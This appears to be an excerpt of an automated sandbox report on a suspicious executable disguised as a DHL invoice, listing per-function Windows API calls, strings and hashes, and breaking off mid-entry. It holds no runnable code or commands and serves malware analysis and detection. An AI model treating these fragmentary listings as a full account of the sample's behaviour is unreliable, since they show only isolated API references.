Opcode ID: 1cdfb326c05579fa5e4107b9664503138b4d59521cb86a3842a273b551113b65
Instruction ID: bcf9db9759e1e7ac4cc65cd4f4bcf8835a69a6efbcc9b9e68a46f6b582272f72
Opcode Fuzzy Hash: 1cdfb326c05579fa5e4107b9664503138b4d59521cb86a3842a273b551113b65
Instruction Fuzzy Hash: 6B113572400109BFEF229F94EC88EAA7F6DEB08350F008025FA199A1A0C7719D65DBA0

Function 012A51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 012A5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 012A5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 012A5230
ReleaseDC.USER32(00000000,00000000), ref: 012A5238
MulDiv.KERNEL32 ref: 012A524F
MulDiv.KERNEL32 ref: 012A5261

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 17ca77ead688a074458dba36b3b1a8b1ddf0818b4122df46f8fc0a59ba7f9de3
Instruction ID: e06dd3eb69d0a08d62c3fe6ac500bc127b837d3704f1b9c1a348f1f4251a1186
Opcode Fuzzy Hash: 17ca77ead688a074458dba36b3b1a8b1ddf0818b4122df46f8fc0a59ba7f9de3
Instruction Fuzzy Hash: F6014F75E01719BBEB109BA9DC49A5EBFB8EF48751F044069FB04A7684D6709810CBA0

Function 01241BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 01241BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 01241BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 01241C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 01241C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 01241C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 01241C22

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 001ab1928f3bf4192e49219646a1577cd3c78891f7a8cdeb8df4aa544f4933b5
Instruction ID: 86528247dfd3d61da2f50f3e97d2203ca29d0c6c974419bec9b35cae736fd3b2
Opcode Fuzzy Hash: 001ab1928f3bf4192e49219646a1577cd3c78891f7a8cdeb8df4aa544f4933b5
Instruction Fuzzy Hash: C80167B0902B5ABDE3008F6A8C85B52FFA8FF59354F00411BA15C4BA42C7F5A864CBE5

Function 012AEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 012AEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 012AEB46
GetWindowThreadProcessId.USER32(?,?), ref: 012AEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 012AEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 012AEB6E
CloseHandle.KERNEL32(00000000), ref: 012AEB75

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cae1f4b799ce4e537ba159415547a19122371de8e9c6debc65b37ea8401458da
Instruction ID: 166c040b1ec8a49862e542517c23587e10db40c8f4c2a708c084ec2e99d812e3
Opcode Fuzzy Hash: cae1f4b799ce4e537ba159415547a19122371de8e9c6debc65b37ea8401458da
Instruction Fuzzy Hash: 61F01D72942168BFEB315B62EC0EEAB7A7CEBCAB11F00015CF601D10849BA06A11C7B5

Function 01297439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 01297452
SendMessageW.USER32(?,00001328,00000000,?), ref: 01297469
GetWindowDC.USER32(?), ref: 01297475
GetPixel.GDI32(00000000,?,?), ref: 01297484
ReleaseDC.USER32(?,00000000), ref: 01297496
GetSysColor.USER32 ref: 012974B0

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 9da015d314d09ed7d63792551b94509a51b38a54bbba71a3be70a051b4015d68
Instruction ID: 81405e8ef294248c826468b29948258d1a1cd2fef7d7534576cb82f20cc9a132
Opcode Fuzzy Hash: 9da015d314d09ed7d63792551b94509a51b38a54bbba71a3be70a051b4015d68
Instruction Fuzzy Hash: 66018B31821215EFDB615FA8EC0DBAE7BB5FB04311F500168FA15A2195CB311E61EF50

Function 012A1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 012A187F
UnloadUserProfile.USERENV(?,?), ref: 012A188B
CloseHandle.KERNEL32(?), ref: 012A1894
CloseHandle.KERNEL32(?), ref: 012A189C
GetProcessHeap.KERNEL32(00000000,?), ref: 012A18A5
HeapFree.KERNEL32(00000000), ref: 012A18AC

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 8992dc3447421decf9fa7f2d8566063dc169c06465d262e87c907293c9f0d9e3
Instruction ID: c2da625dd6b75da96d5575e209a2b68e021b03e3ec325ee2aeb63d1bc6c3b0ae
Opcode Fuzzy Hash: 8992dc3447421decf9fa7f2d8566063dc169c06465d262e87c907293c9f0d9e3
Instruction Fuzzy Hash: 59E0E536845151FBDB116FB1FD0C90ABF39FF49B22B104228F225810A8CB329430DB50

Function 012AC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01247620: _wcslen.LIBCMT ref: 01247625

GetMenuItemInfoW.USER32 ref: 012AC6EE
_wcslen.LIBCMT ref: 012AC735
SetMenuItemInfoW.USER32 ref: 012AC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 012AC7CA

Strings

0, xrefs: 012AC6AF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: bc78348031cc2339a27a9422f4314f8c80658eab8a38f2e46ee32d42792e95c7
Instruction ID: d98b14333678913df0f5682257a4b2f60399f8e4d931f6a763f83bab5254a925
Opcode Fuzzy Hash: bc78348031cc2339a27a9422f4314f8c80658eab8a38f2e46ee32d42792e95c7
Instruction Fuzzy Hash: 8551B2716243029BE719DE2CCC84A7A7BE8AB85714F840A2DFBA5D21D0DB70D424CB52

Function 012CAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 012CAEA3

Part of subcall function 01247620: _wcslen.LIBCMT ref: 01247625

GetProcessId.KERNEL32(00000000), ref: 012CAF38
CloseHandle.KERNEL32(00000000), ref: 012CAF67

Strings

<, xrefs: 012CAE6B
@, xrefs: 012CAE72

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: cec1716c286ae21910958a700ee4e351dd4c792362ed85045a5f7a4d1576b47d
Instruction ID: 5bbefb2b2d7bd5df3873bb26e0b3377fc5bebab62f6fea37c78734f2ceae4763
Opcode Fuzzy Hash: cec1716c286ae21910958a700ee4e351dd4c792362ed85045a5f7a4d1576b47d
Instruction Fuzzy Hash: CC717770A1021ADFCB18DF58C484AAEBBF0EF18714F04849DEA16AB391D771ED41CB90

Function 012A719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 012A7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 012A723C
GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 012A724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 012A72CF

Strings

DllGetClassObject, xrefs: 012A7242

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: e414acf442d45441aa18abd7ce486d88a822fc76df7f6030c3ff4a1254a7a85f
Instruction ID: 2ae0f6272e0aebe2f920a240072affd5f5069a4041da2a31ae3478c2eb330759
Opcode Fuzzy Hash: e414acf442d45441aa18abd7ce486d88a822fc76df7f6030c3ff4a1254a7a85f
Instruction Fuzzy Hash: BD416271A10205EFEB15CF64C885A9A7FB9EF44310F5480ADBE05DF20AD7B2D945CBA4

Function 012D3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 012D3E35
IsMenu.USER32(?), ref: 012D3E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 012D3E92
DrawMenuBar.USER32 ref: 012D3EA5

Strings

0, xrefs: 012D3D89

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: ae6677f94cc59a9285299a191133c1572de5ccf56b8781711cc1a22760dd0e15
Instruction ID: 9c904a91327e0e486d3060031cb9ce74098a66302362105f752b39a05ee00b32
Opcode Fuzzy Hash: ae6677f94cc59a9285299a191133c1572de5ccf56b8781711cc1a22760dd0e15
Instruction Fuzzy Hash: 4D415FB5A2120AEFDB20DF54D884EEABBB9FF49350F044119EA15A7290D730E954CF51

Function 012A1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Part of subcall function 012A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 012A3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 012A1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 012A1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 012A1EA9

Part of subcall function 01246B57: _wcslen.LIBCMT ref: 01246B6A

Strings

ComboBox, xrefs: 012A1DF0
ListBox, xrefs: 012A1E25

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: e031be229ab1cad504cc09c279ad62b55bc4fe104e8f87fbeed3abd691db7763
Instruction ID: 0e3332f9e52bc784684b766d51cce623f2a5ec192474a6b8c65dceecd4f01ef4
Opcode Fuzzy Hash: e031be229ab1cad504cc09c279ad62b55bc4fe104e8f87fbeed3abd691db7763
Instruction Fuzzy Hash: 87213271A20105BFEB18ABA9DD48CFFBBB9EF55364F404119EA21A72D0DB3449198B60

Function 012D2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 012D2F8D
LoadLibraryW.KERNEL32(?), ref: 012D2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 012D2FA9
DestroyWindow.USER32 ref: 012D2FB1

Strings

SysAnimate32, xrefs: 012D2F68

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 1288107b2e1098b01b7ba2d9b4727e3e1f0d1e28624605df27f68b61e62d85c1
Instruction ID: 44381f11c3eae2cdceca04001cfe34a441c08d5ce35134241617fcfad65b4c37
Opcode Fuzzy Hash: 1288107b2e1098b01b7ba2d9b4727e3e1f0d1e28624605df27f68b61e62d85c1
Instruction Fuzzy Hash: 0C21FD71224206EFEB224E68DC84FBB3BADEF49328F104A58FB54D2194C771DC5197A0

Function 01264D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01264D1E,012728E9,?,01264CBE,012728E9,013088B8,0000000C,01264E15,012728E9,00000002), ref: 01264D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,01264D1E,012728E9,?,01264CBE,012728E9,013088B8,0000000C,01264E15,012728E9,00000002), ref: 01264DA0
FreeLibrary.KERNEL32(00000000,?,?,?,01264D1E,012728E9,?,01264CBE,012728E9,013088B8,0000000C,01264E15,012728E9,00000002,00000000), ref: 01264DC3

Strings

mscoree.dll, xrefs: 01264D86
CorExitProcess, xrefs: 01264D98

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9534bd9515da36e33662e53971ff5be3a2908de99a5f6edce254069c250c5653
Instruction ID: 08c7d2fa65c66398b0d0b18bf6ed1c28f53fd7d2e9ed8066df84e7b0c24430e1
Opcode Fuzzy Hash: 9534bd9515da36e33662e53971ff5be3a2908de99a5f6edce254069c250c5653
Instruction Fuzzy Hash: 9EF0C830E51219FBDB259F95D80DBADBFF8EF54751F000198FA05A2180CF708A90CB94

Function 01244E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 01244E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,01244EDD,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244EAE
FreeLibrary.KERNEL32(00000000,?,?,01244EDD,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 01244EA8
kernel32.dll, xrefs: 01244E94

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 25b583b70d1ec894c0c84c7d335054b667b4a669420ff9b8346e566cacefc8a6
Instruction ID: dadc5308ed60c72391c193ca2d981b13255c6f1b6bc0f9428f2327c55d641a1f
Opcode Fuzzy Hash: 25b583b70d1ec894c0c84c7d335054b667b4a669420ff9b8346e566cacefc8a6
Instruction Fuzzy Hash: 29E0E635F165739BE2362639F81CB5B69989F81A62705011DFE05D2244DF64C911C6A1

Function 01244E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 01244E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,01283CDE,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244E74
FreeLibrary.KERNEL32(00000000,?,?,01283CDE,?,01311418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 01244E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 01244E6E
kernel32.dll, xrefs: 01244E5B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: b90cf4acf037ef276d37be385fed672023dcd8bea81008590eb0c15310b5231e
Instruction ID: 701a6be74f299022a6bb8bf8e89f2b80bdc354d745dc93042f335defce5e879e
Opcode Fuzzy Hash: b90cf4acf037ef276d37be385fed672023dcd8bea81008590eb0c15310b5231e
Instruction Fuzzy Hash: 94D01235A1767357AA362A39F81CE8B6E189F85A55305061DFB05E3108DF61C911C6E0

Function 012CA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 012CA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 012CA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 012CA468
CloseHandle.KERNEL32(?), ref: 012CA63D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 425f37e1b44ff181e32ae75d836fe82b3688397bf1ccc453c0668c80ce1ccd81
Instruction ID: 8ce33d999e44ebcc01a0317d5d4c198518d339211a56001d629c41597265ccd5
Opcode Fuzzy Hash: 425f37e1b44ff181e32ae75d836fe82b3688397bf1ccc453c0668c80ce1ccd81
Instruction Fuzzy Hash: 86A1AF716143029FE724DF28D885B3ABBE0AF94B14F14891DFA5A9B391DB70EC418B81

Function 0127BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,012E3700), ref: 0127BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0131121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0127BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,01311270,000000FF,?,0000003F,00000000,?), ref: 0127BC36
_free.LIBCMT ref: 0127BB7F

Part of subcall function 012729C8: HeapFree.KERNEL32(00000000,00000000), ref: 012729DE
Part of subcall function 012729C8: GetLastError.KERNEL32(00000000,?,0127D7D1,00000000,00000000,00000000,00000000,?,0127D7F8,00000000,00000007,00000000,?,0127DBF5,00000000,00000000), ref: 012729F0

_free.LIBCMT ref: 0127BD4B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 88f8f03b69e6703ba13bc5b16fb2a74baf04700e170ef836a7749c059c046656
